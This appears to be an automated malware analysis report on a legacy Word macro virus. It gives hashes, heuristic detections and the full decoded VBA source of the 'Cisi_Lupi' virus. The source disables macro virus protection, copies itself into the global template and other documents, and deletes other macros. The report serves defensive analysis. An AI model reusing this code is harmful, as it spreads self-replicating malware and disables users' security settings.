Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ba42d87de16f6cf0…

MALICIOUS

Office (OLE)

Size: 60.5 KB · Created: 1997-09-17 10:18:00 · Authoring application: Microsoft Word 8.0 · First seen: 2012-06-14
MD5: ce5d89e1033a5cdb8869f052b2a5473a SHA-1: a5dfeb455dc40d44fe8b5f09e97889dc438a529d SHA-256: ba42d87de16f6cf0785f10727b162a34e76a2c0d75e1256498af8c904c99eff1
204 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample contains legacy WordBasic macro virus markers and VBA macros, including AutoOpen and Document_Open, indicating malicious intent. The script attempts to disable security features (e.g. Options.VirusProtection = False) and modify application settings (resetting key bindings and command bars), consistent with a macro-based threat. The ClamAV detection as 'Doc.Trojan.Bablas-19' further supports its malicious nature.

Heuristics 7

  • ClamAV: Doc.Trojan.Bablas-19 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Bablas-19
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
      Options.VirusProtection = False
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
          "Private Sub Document_Open()" + vbCrLf + _
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers, such as AutoOpen combined with ToolsMacro/MacroFile/fileMacro/globMacro, or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6498 bytes
SHA-256: 26d03ec462354483eeadddd384ef84cd991f1a6b169af2583913ad67c66f4a47
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Cisi_Lupi v1.10.000


Attribute VB_Name = "Cisi_Lupi"
'Program kecil ini adalah virus,
'tetapi BUKAN yang akan merusak komputer
'anda, tapi, daripada M$Word ada kena virus
'lain yang ganas, maka lebih baik saya handle
'
'Hormat Saya,
'Syarif Lumintarjo
'<syarifl@bigfoot.com>'

Const DEBUG_MODE = False
Const virName = "Cisi_Lupi"

Function virVersion() As String
  virVersion = "1.10.000"
End Function

Sub ShowMessage()
  MsgBox "Thank's for Not Deleting Cisi_Lupi", vbOKOnly
End Sub

Sub CL_OpenSecurity()
  Options.SaveNormalPrompt = False
  Options.VirusProtection = False
  Options.SavePropertiesPrompt = False
End Sub

'Sub ToolsMacro()
    'Application.VBE.MainWindow.Visible = True
'End Sub

'Sub ViewVbCode()
    'ToolsMacro
'End Sub

'Sub FileTemplates()
    'ToolsMacro
'End Sub

'Sub HelpAbout()
'End Sub

Sub ToolsOptions()
  Options.SaveNormalPrompt = True
  Options.SavePropertiesPrompt = True
  Options.VirusProtection = True
  Dialogs(wdDialogToolsOptions).Show
  CL_OpenSecurity
End Sub

Sub ChangeCap()
On Error Resume Next
  Application.Caption = "Micro$oft Word"
  ActiveWindow.Caption = ActiveDocument.Name
End Sub

Sub RestoreCap()
On Error Resume Next
  Application.Caption = "Bappebti Microsoft Word"
  ActiveWindow.Caption = ActiveDocument.Name
End Sub

Sub CL_ResetSettings()
  KeyBindings.ClearAll
  On Error Resume Next
  For Each Obj In CommandBars
    Obj.reset
  Next Obj
  Options.CheckGrammarAsYouType = False
  Options.CheckSpellingAsYouType = False
  Options.CheckGrammarWithSpelling = False
  Options.DefaultFilePath(wdUserTemplatesPath) = "C:\Program Files\Microsoft Office\Templates"
End Sub

Sub CL_ThisDocumentWriter(pkg)
  Set cm = pkg.VBProject.VBComponents(1).CodeModule
  s = "'Cisi_Lupi" + vbCrLf + _
      "Private Sub Document_Close()" + vbCrLf + _
      "TD_DocClose" + vbCrLf + _
      "End Sub" + vbCrLf + _
      "Private Sub Document_New()" + vbCrLf + _
      "TD_DocNew" + vbCrLf + _
      "End Sub" + vbCrLf + _
      "Private Sub Document_Open()" + vbCrLf + _
      "TD_DocOpen" + vbCrLf + _
      "End Sub"
  cm.AddFromString "'Cisi_Lupi v" + virVersion + vbCrLf
End Sub

Function CL_ClearComps(Direction) As Boolean

  Select Case Direction
    Case 1: Set Package = Application.NormalTemplate
    Case 2: Set Package = Application.ActiveDocument
    Case Else
      Exit Function
  End Select
  
  Set Comps = Package.VBProject.VBComponents
  Comps(1).CodeModule.DeleteLines 1, Comps(1).CodeModule.CountOfLines
  IsOk = False
    
  For Each Obj In Comps
    If Obj.Name = virName Then IsOk = True
    If Obj.Name = "ThisDocument" Then CL_ThisDocumentWriter Package
    If Obj.Name <> virName And Obj.Name <> "ThisDocument" Then
      Application.OrganizerDelete _
        Source:=Package.FullName, _
        Name:=Obj.Name, _
        Object:=wdOrganizerObjectProjectItems
    End If
  Next Obj

  CL_ClearComps = IsOk
  
End Function

Sub CL_OrgCopy(CompName, Direction)
On Error Resume Next
  Select Case Direction
    Case 1 'NormalTemplate to ActiveDocument
    If DEBUG_MODE Then MsgBox NormalTemplate.FullName + " >> " + ActiveDocument.FullName
    Application.OrganizerCopy _
      Source:=NormalTemplate.FullName, _
      Destination:=ActiveDocument.FullName, _
      Name:=CompName, _
      Object:=wdOrganizerObjectProjectItems
    Case 2 'ActiveDocument to NormalTemplate
    If DEBUG_MODE Then MsgBox ActiveDocument.FullName + " >> " + NormalTemplate.FullName
    Application.OrganizerCopy _
      Source:=ActiveDocument.FullName, _
      Destination:=NormalTemplate.FullName, _
      Name:=CompName, _
      Object:=wdOrganizerObjectProjectItems
  End Select
End Sub

Sub TemClearComponents()
  IsOk = CL_ClearComps(1)
  If Not IsOk Then CL_OrgCopy virName, 2
  CL_ResetSettings
End Sub

Sub DocClearComponents()
  IsOk = CL_ClearComps(2)
  If Not IsOk Then CL_OrgCopy virName, 1
  CL_ResetSettings
End Sub

Sub AutoExit()
  If DEBUG_MODE Then MsgBox "AutoExit()"
  ShowMessage
  Application.Quit
End Sub

Sub FileOpen()
  If DEBUG_MODE Then MsgBox "FileOpen()"
  ChangeCap
  WordBasic.DisableAutoMacros True
  On Error Resume Next
  If Dialogs(wdDialogFileOpen).Show <> 0 Then
    DocClearComponents
    ActiveDocument.Save
  End If
  RestoreCap
  WordBasic.DisableAutoMacros False
End Sub

Sub AutoOpen()
  If DEBUG_MODE Then MsgBox "AutoOpen()"
  CL_OpenSecurity
  ChangeCap
  TemClearComponents
  On Error Resume Next
  NormalTemplate.Save
  RestoreCap
End Sub

Sub AutoClose()
  If DEBUG_MODE Then MsgBox "AutoClose()"
  DocClearComponents
  ActiveWindow.Close
End Sub

Sub FileClose()
  If DEBUG_MODE Then MsgBox "FileClose()"
  AutoClose
End Sub

Sub FileSave()
  If DEBUG_MODE Then MsgBox "FileSave()"
  If ActiveDocument.Saved = False Then
    DocClearComponents
    TemClearComponents
    On Error Resume Next
    ActiveDocument.Save
    ActiveDocument.Saved = True
  End If
End Sub

Sub AutoExec()
  If DEBUG_MODE Then MsgBox "AutoExec()"
  WordBasic.DisableAutoMacros True
  CL_OpenSecurity
  Application.OnTime Now + TimeValue("00:00:07"), "Normal." + virName + ".Demolish"
End Sub

Sub TD_DocOpen()
  MsgBox "TD_DocOpen"
End Sub

Sub TD_DocClose()
  MsgBox "TD_DocClose"
End Sub

Sub TD_DocNew()
  MsgBox "TD_DocNew"
End Sub

Sub Demolish()
On Error Resume Next
  C = Documents.Count
  If C <> 0 Then
    Normal.Cisi_Lupi.DocClearComponents
    WordBasic.DisableAutoMacros False
    If ActiveDocument.Name <> "Document1" Then ActiveDocument.Save
  Else
    Application.OnTime Now + TimeValue("00:00:07"), "Normal." + virName + ".Demolish"
  End If
End Sub

Function CL_FindVBComponent(vbp, ComponentName) As Integer
  isFound = False
  i = 1
  For Each Obj In vbp.VBComponents
    isFound = (Obj.Name = ComponentName)
    If isFound Then Exit For
    i = i + 1
  Next Obj
  If isFound Then CL_FindVBComponent = i Else CL_FindVBComponent = -1
End Function

Function CL_GetVersion(vbc) As Integer
  s = vbc.CodeModule.Lines(1, 1)
  If s <> "" Then s = Right(s, Len(s) - 1)
  CL_GetVersion = Val(s)
End Function